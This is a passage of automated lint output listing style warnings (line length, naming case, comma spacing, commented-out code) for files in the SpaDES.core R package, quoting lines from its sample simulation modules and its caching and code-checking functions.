\"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         